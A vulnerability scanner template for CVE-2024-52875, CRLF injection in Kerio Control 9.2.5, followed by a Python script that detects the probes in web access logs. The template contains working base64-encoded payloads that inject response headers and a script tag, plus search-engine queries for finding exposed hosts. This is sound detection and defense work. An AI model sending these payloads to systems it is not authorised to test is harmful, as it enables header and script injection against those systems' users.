Vulnerability Description
Kerio Control, formerly known as Kerio WinRoute Firewall, is vulnerable to multiple HTTP Response Splitting vulnerabilities affecting version 9.2.5.
id: CVE-2024-52875

info:
  name: Kerio Control v9.2.5 - CRLF Injection
  author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
  reference:
    - https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
    - https://nvd.nist.gov/vuln/detail/CVE-2024-52875
  classification:
    cve-id: CVE-2024-52875
    cwe-id: CWE-74
    epss-score: 0.82419
    epss-percentile: 0.99183
  metadata:
    verified: true
    max-request: 4
    shodan-query: "Kerio Control"
    fofa-query: "Kerio Control"
  tags: cve,cve2024,kerio,crlf,vkev,vuln

http:
  - method: GET
    # The dest parameter is base64 (URL-encoded padding %3d).
    # VGVzdA0KQ1JMRjo= decodes to "Test\r\nCRLF:"; the last value decodes to two LFs followed by the script tag checked below.
    path:
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
      - "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      # Match 1: the injected "CRLF:" line shows up as its own response header.
      - type: regex
        part: header
        regex:
          - '(?m)^Crlf:\s*$'

      # Match 2: the injected markup is reflected in the body of the 302 response.
      - type: dsl
        dsl:
          - "contains(body,'<script>alert(document.domain)</script>')"
          - 'contains(content_type, "text/html")'
          - 'contains(location, "")'
          - 'status_code == 302'
        condition: and
# digest: 490a00463044022050c793779b47bb050a71113d6b178d3627227c9ef11cb152b68e6fd8fcbb2ff502203a4f9aa4af091910a4d7ab674f3d60a6b5be16f70be1d26400b865ee71ae59e0:922c64590222798bb761d5b6d8e72950
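
Every probe in the template carries a base64-encoded `dest` value that decodes to text containing CR or LF. As an added example (not part of the original page or of the template project), the Python below flags such requests in web access logs for the three `/nonauth/` paths listed above; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Paths come from the template above; the access-log format is an assumption.
WATCHED = re.compile(r"^/nonauth/(guestConfirm|addCertException|expiration)\.cs$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_dest(value):
    """Base64-decode a dest value, tolerating missing padding; None if not base64."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def suspicious_dest(log_line):
    """Return the decoded dest bytes when a watched path gets a dest with CR/LF."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not WATCHED.match(url.path):
        return None
    for value in parse_qs(url.query).get("dest", []):
        raw = decode_dest(value)
        if raw is not None and (b"\r" in raw or b"\n" in raw):
            return raw
    return None


# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 302 0',
    '192.0.2.11 - - [01/Jan/2025:10:00:05 +0000] "GET /nonauth/expiration.cs?dest=aHR0cHM6Ly9leGFtcGxlLmNvbS8%3d HTTP/1.1" 302 0',
    '192.0.2.12 - - [01/Jan/2025:10:00:09 +0000] "GET /index.html?dest=VGVzdA0KQ1JMRjo%3d HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hit = suspicious_dest(line)
        if hit is not None:
            print("ALERT", repr(hit), "<-", line.split('"')[1])
```

Only the first sample line is flagged: the second decodes to a plain URL with no line breaks, and the third targets a path outside the watched set.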